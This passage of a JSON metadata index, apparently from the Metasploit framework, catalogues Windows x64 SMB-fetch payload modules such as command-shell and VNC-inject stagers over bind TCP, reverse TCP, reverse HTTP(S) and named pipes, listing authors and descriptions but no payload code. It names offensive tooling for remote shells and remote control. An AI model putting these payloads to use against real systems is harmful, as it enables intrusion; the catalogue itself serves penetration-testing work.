],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/shell/bind_ipv6_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/shell/bind_ipv6_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/shell",
|
||||
"stager_refname": "windows/x64/bind_ipv6_tcp_uuid"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/shell/bind_named_pipe": {
|
||||
"name": "SMB Fetch, Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/shell/bind_named_pipe",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/shell/bind_named_pipe",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/shell/bind_named_pipe",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/shell",
|
||||
"stager_refname": "windows/x64/bind_named_pipe"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/shell/bind_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 Command Shell, Windows x64 Bind TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/shell/bind_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/shell/bind_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/shell/bind_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/shell",
|
||||
"stager_refname": "windows/x64/bind_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/shell/bind_tcp_rc4": {
|
||||
"name": "SMB Fetch, Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/shell/bind_tcp_rc4",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"hdm <x@hdm.io>",
|
||||
"skape <mmiller@hick.org>",
|
||||
"mihi",
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/shell/bind_tcp_rc4",
|
||||
"check": false,
|
||||
"post_auth": true,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/shell/bind_tcp_rc4",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/shell",
|
||||
"stager_refname": "windows/x64/bind_tcp_rc4"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/shell/bind_tcp_uuid": {
|
||||
"name": "SMB Fetch, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/shell/bind_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/shell/bind_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/shell/bind_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/shell",
|
||||
"stager_refname": "windows/x64/bind_tcp_uuid"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/shell/reverse_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 Command Shell, Windows x64 Reverse TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/shell/reverse_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/shell/reverse_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/shell/reverse_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/shell",
|
||||
"stager_refname": "windows/x64/reverse_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/shell/reverse_tcp_rc4": {
|
||||
"name": "SMB Fetch, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/shell/reverse_tcp_rc4",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"hdm <x@hdm.io>",
|
||||
"skape <mmiller@hick.org>",
|
||||
"mihi",
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/shell/reverse_tcp_rc4",
|
||||
"check": false,
|
||||
"post_auth": true,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/shell/reverse_tcp_rc4",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/shell",
|
||||
"stager_refname": "windows/x64/reverse_tcp_rc4"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/shell/reverse_tcp_uuid": {
|
||||
"name": "SMB Fetch, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/shell/reverse_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/shell/reverse_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/shell/reverse_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/shell",
|
||||
"stager_refname": "windows/x64/reverse_tcp_uuid"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/shell_bind_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 Command Shell, Bind TCP Inline",
|
||||
"fullname": "payload/cmd/windows/smb/x64/shell_bind_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection and spawn a command shell (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/shell_bind_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/shell_bind_tcp",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/shell_reverse_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 Command Shell, Reverse TCP Inline",
|
||||
"fullname": "payload/cmd/windows/smb/x64/shell_reverse_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to attacker and spawn a command shell (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/shell_reverse_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/shell_reverse_tcp",
|
||||
"staged": false
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/vncinject/bind_ipv6_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/vncinject/bind_ipv6_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/vncinject/bind_ipv6_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/vncinject",
|
||||
"stager_refname": "windows/x64/bind_ipv6_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/vncinject/bind_ipv6_tcp_uuid": {
|
||||
"name": "SMB Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support",
|
||||
"fullname": "payload/cmd/windows/smb/x64/vncinject/bind_ipv6_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/vncinject/bind_ipv6_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/vncinject",
|
||||
"stager_refname": "windows/x64/bind_ipv6_tcp_uuid"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/vncinject/bind_named_pipe": {
|
||||
"name": "SMB Fetch, Windows x64 Bind Named Pipe Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/vncinject/bind_named_pipe",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/vncinject/bind_named_pipe",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/vncinject/bind_named_pipe",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/vncinject",
|
||||
"stager_refname": "windows/x64/bind_named_pipe"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/vncinject/bind_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 Bind TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/vncinject/bind_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/vncinject/bind_tcp",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/vncinject/bind_tcp",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/vncinject",
|
||||
"stager_refname": "windows/x64/bind_tcp"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/vncinject/bind_tcp_rc4": {
|
||||
"name": "SMB Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/vncinject/bind_tcp_rc4",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"hdm <x@hdm.io>",
|
||||
"skape <mmiller@hick.org>",
|
||||
"mihi",
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/vncinject/bind_tcp_rc4",
|
||||
"check": false,
|
||||
"post_auth": true,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/vncinject/bind_tcp_rc4",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/vncinject",
|
||||
"stager_refname": "windows/x64/bind_tcp_rc4"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/vncinject/bind_tcp_uuid": {
|
||||
"name": "SMB Fetch, Bind TCP Stager with UUID Support (Windows x64)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/vncinject/bind_tcp_uuid",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/vncinject/bind_tcp_uuid",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/vncinject/bind_tcp_uuid",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/vncinject",
|
||||
"stager_refname": "windows/x64/bind_tcp_uuid"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/vncinject/reverse_http": {
|
||||
"name": "SMB Fetch, Windows x64 Reverse HTTP Stager (wininet)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_http",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/vncinject/reverse_http",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/vncinject/reverse_http",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/vncinject",
|
||||
"stager_refname": "windows/x64/reverse_http"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/vncinject/reverse_https": {
|
||||
"name": "SMB Fetch, Windows x64 Reverse HTTP Stager (wininet)",
|
||||
"fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_https",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"hdm <x@hdm.io>",
|
||||
"agix",
|
||||
"rwincey"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2024-01-04 14:11:03 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/smb/x64/vncinject/reverse_https",
|
||||
"check": false,
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false,
|
||||
"payload_type": 8,
|
||||
"adapter_refname": "cmd/windows/smb/x64",
|
||||
"adapted_refname": "windows/x64/vncinject/reverse_https",
|
||||
"staged": true,
|
||||
"stage_refname": "windows/x64/vncinject",
|
||||
"stager_refname": "windows/x64/reverse_https"
|
||||
},
|
||||
"payload_cmd/windows/smb/x64/vncinject/reverse_tcp": {
|
||||
"name": "SMB Fetch, Windows x64 Reverse TCP Stager",
|
||||
"fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_tcp",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "payload",
|
||||
"author": [
|
||||
"Spencer McIntyre",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
],
|
||||
"platform": "Windows",
|
||||
"arch": "cmd",
|
||||
"rport": null,
|
||||
"autofilter_ports": null,
